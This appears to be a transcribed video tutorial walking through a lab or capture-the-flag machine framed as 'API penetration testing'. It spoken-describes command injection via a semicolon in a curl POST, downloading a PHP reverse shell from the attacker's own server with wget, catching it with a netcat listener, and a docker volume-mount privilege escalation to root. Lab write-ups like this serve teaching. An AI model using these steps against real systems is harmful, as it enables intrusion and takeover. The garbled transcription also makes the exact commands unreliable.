Hello guys, welcome back to a Pentesters Club. Today we are going to discuss about API penetration testing. So what is API penetration testing? So API penetration testing involves the accessing the security of applications like application program interface. So there are like a basic fundamentals like understanding the APIs, threat modeling and testing HTTP methods and authentication and authorization and session management and data validation and error handling and rate limiting and security and logging and monitoring and documentation review. So to conduct API penetration testing, so we would like to know only the basic two simple steps. So that is get and post. So get request. So it will examine the input parameters of the potential injection vulnerabilities and test the unauthorized access by manipulating a parameters and check for a sensitive information and disclose in responses, and it access the API's handling of various data types. And also what is the post request? So it tests the input validation by sending a unaccepted or malicious data, and it evaluates how API can handle unauthentication and authorizations, and it checks the security misconfiguration in the request handling. It acts the API resilience against a common web vulnerabilities. So now we would like to look how this will be work for our penetration testing in API pen testing. So what is the basic penetration testing methodologies we use? So the basic penetration testing methodologies we used here: network scanning, enumeration, and exploiting, and privilege escalations. And we would like to get the our root flag. So I'm not going to use any type of burp suit or etc. suits. So I'm doing everything in command prompt on Linux terminal. Okay. So let's open the terminal. So now you just type sudo su and enter your password, and you just type net discover minus I is 0. So here is our targeted machine and IP address. So I just quit now. So I just go nmap minus t4 minus a 192.168.1.131. So let's wait for nmap result. So here I got the nmap result. You would like to look very carefully here. Once you get the nmap result, 21 is an FTP. So FTP server status unconnected, and you would like to look logged in as FTP, no session and bandwidth and everything. So FTP anonymous is an FTP login allowed. So FTP username is anonymous, and 22 is an SSH. So we would like to crack this, and 80 is an server, 3306 is an TCP of MySQL server, and 8000 it's like a API access, like most like a blockchain servers or etc. things like blockchain crypto.com, they use the same similar format of this. So we are going to do a penetration testing with API. So we are going to do a API penetration testing in this. So once we have done this one, now we would like to go for FTP 192.168.1.131. So we would like to use anonymous and just enter. So you just type a list. Here you find note. So you just need to type get note. So we got it the note. So come back here. So now you just type cat note. So to do, move these modules of HTTP server running So here have a Docker machine. I hear a containers make a things inherently so secure. Maybe this will be shut those security reaches up. Also, don't forget to remove all the privilege escalations and exploit in the temporary file. So we don't want to rebuild the servers again. Upsojet. So this is the username. So we got it some information. So now what we would like to do? So now we would like to open the Firefox. I just type 192.168.1.131. Sorry, here I was mistaken. 1.131. So here we got it. So it's have opening the public soon. Bear with us, we are experimenting with the technologies of our website. So we would like to look robot.txt is working or not. So nothing else found, not found. So now come back. So I would like to enumerate secret list. So I just type directory buster http 192.168.1.131. So here you can see here Drupal. So Drupal is a popular open source content management CMS used for building a website and applications. And we can see here only one Drupal and one directory is a WordPress. So this API pen testing we are using a Drupal as well as WordPress. So let it gather all information. So now let's wait for this. And here I would like to also go here with Nginx of Ubuntu 8000. Okay, so come back here 8000. So the API interface is coming soon here. So we would like to look page source. Anything we found? No, only a two format. HTML API coming is soon, so it's okay. So now let's wait for this. So it's taking too much time. So let's wait for this. So it's in Drupal as well as WordPress. So WordPress hidden content like WP login, everything is coming. So let's wait for this. So in this, we would like to get two things. One is Drupal, one is WordPress. So you need to keep it very strong in this for your target to get the API penetration testing. So this was done. So now I would like to use a specific things. Like I would like to go for API penetration testing, and I would like to extract some hidden files. So I would like to target only the WordPress as well as Drupal. So this is only our two targets, and minus X. So I would like to mention my extension file php.txt comma.python. So let's wait for this one. So here we got it one. And we got it two here. So now what we would like to do? So now we would like to do the curve. So using with the curve, and just copy this one, test. So I'm not gonna using for API penetration testing like Postman, including the verb suit. So get the request from there, getting here. So that will take you plenty of time wasting. So here I'm using only the terminal, Linux terminal, everything clear here. So it's a very simple for API penetration testing. So we are going in depth everything. So just paste it. So you can see here, please post a proper query. Example like HTTPS caffeine tadeengineers.com. Okay, no worries. So now we would like to get the download the keywords.python file into our system and execute the script, and we would like to go further. So you just type wc get and you just need to get it from here. Copy, paste it. Yes, we got it. So you just type list. Yes. Here have keywords.python. So now what you would like to do? So you just type python 3 and you just type keywords.python minus minus help. You would like to look. It's giving. So site of crawl of a keywords. So we would like to use here query. So come back. We just type query and I would like to use the same first one. So just copy this one, paste to a clipboard. So here home pentesterclub.com keywords markup resemble warning. The input looks more like a file name than markup. So you want to open this file and password of the file handle into a beautiful soap HTML parser. So if you get some type of errors, so you no need to worry here. Okay. So now what you would like to do? So you just need to use the same thing python 3 keywords.python query, and you just need to remove here. So only the targeted domain. That's it. That's it. Now you would like to use. You would like to set up. So our target is here. Uh, one is Drupal and another one is WordPress. You understand? So we would like to get from here. So we would like to add here Drupal and we would like to add WordPress. So we have successfully added here. So now let's wait. So here getting the response, the 3, hour 3, 2, 3, 4, 2, issues 2. So we are getting something response like this. So now we are going for exploitation. So this one. So for exploiting, so we thought sending a post request to a test.php as shown uh, below. So the result shows a test.php scripts and acting the wrapper. So we would like to do this one now. So we just type cur minus d. So I'm going to use query equal to, I would like to use this one, WordPress, paste the clipboard, and you just need to use the test.php, this one, copy and paste it. So now let's wait. So site keywords count. So we are getting the same results as up here. So we are getting the, like if you post something, so we are getting the result. Okay. So now we would like to use same here WordPress. We just give semicolon, and you just type id. So we would like to get the id or not, we would like to see yes. So we are successfully getting the access here. So it was present in the docker. When you see in the notepad.txt, you can see here the docker is present. So we are getting the docker inside. So after a little bit playing around with the remote code execution, so we did some enumeration like creating like a reverse shell PHP. So it's already is in the WordPress and Drupal. So WordPress and Drupal is like that will be automatically exploited by PHP reverse shell. So we would like to go with the PHP reverse shell for this one. So for that we would like to go. So you just type curve. So you just come back here, WordPress, query WordPress, and we would like to type here pwd list minus la. So now I would like to do enter. Now let's wait, either we would like to get a result. Yes, we have successfully get the result. You can see here API. In the API have docker file, index.html, keywords, and test.php. So now we would like to do upload our PHP reverse shell in this. Okay. So for that, we would like to do now. Let me show you. So if you not yet downloaded the PHP reverse shell, so I would like to show you here. Come back here. You need to get here PHP reverse shell pentest monkey. So you just need to get it from here PHP reverse shell. So this is here PHP reverse shell, but I already have in my system PHP reverse shell. So you just need to copy this one, copy. So you just copy. So I don't want this one. So this also is not important now. API. So I just close the Firefox. So just come back here also. So you just need to look first. I config. Here is 100. So you just need to change the PHP reverse shell into your IP address. So I just type list here. Here I have a reverse shell PHP. So I just type cat rshell.php. So let me show you. Here I already make it this one, change my IP address here 192.168.1.100. So here I have reverse shell. So I just type clear from here. So I have here in the reverse shell. So now with the same thing, so we just need to type curl minus d in the WordPress. So you would like to get the uh, reverse shell here. So you just need to come back here. You just type wget http 192.168.1.100 So I not yet even started the HTTP server. So I just type Python. So here HTTP server is started. Come back here. rshell.php. List minus LA. So here you would like to enter properly here wz get http. So your Kali Linux IP machine address. So if you use Parrot OS, you need to enter your Parrot IP address machine and the port, reverse shell, PHP, and list minus all. So you just type enter and let's see we get the reverse shell or not. So here we have successfully get the reverse shell. Okay. So now what we would like to do? So we would like to exploit this one. Also, you would like to look here. So January 4th, 2024, reverse shell is successfully get out. So just quit now. You just type netcat minus lvnp1234. That's it. So it will be listening everything. So now what you would like to look here. So now you would like to look. So now you just come back here. So you just need to exploit this one. So you just need to come back. So you just type the same thing here. So you just need to come back here. So you just need to remove all these things. You just need to execute the PHP reverse shell. So for that, what you would like to do? So you just need to type simple as it is. You just type it is in PHP language, PHP r shell dot PHP. That's it. So come back. Now let's wait here. Once it was executed, we get here a ID. So you see here, we got it successfully exploited. So you just type ID, we got it the ID. So we just need to go for executing directly to the this one python minus c import pty span bin bash. So we got it directly. So you just type list, got it, and you just type ID. Here we came to a Docker ID. So now I just type pwd. It's giving the pwd. So now we go for privilege escalation. So for getting the privilege escalation, just open the terminal. So it was in the Docker. So for getting the privilege escalation of bins, so you just type gtfo bins. So to proceed with our privilege escalations, we tried a few things but did not work out. So we are going to get the final flag from here. So go to a gtfo bins. You just type docker. So I would like to use this one, a docker run minus v mount. So it was in Ubuntu, so I would like to use this one. So come back here. So you just type docker run it minus v. I want to get the root access, so I just type root mount. So you just give your targeted name like your choice is your wish. And it was in also in the Ubuntu when you see in the nmap. So you can see here Nginx, it is in Ubuntu. So we are going to do Ubuntu. So it's running. So let's downloading that one and it will extract. So you can see here from we get the root access, from root access to uh, API user to a root access user here. So we are directly got it. So now you just type cd uh, mount, we got it. Then you just type cd. So what is the username you was given here? As Alex. So you just type give Alex. Now you just type list. You got it, proof.txt. So you just type cat proof.txt. So you have successfully got it. The congratulations. Hope you enjoyed this. So this is how you can do the API penetration testing without using the worksuit or Postman. So you try it your own, guys. Thank you guys for watching. Have a great day.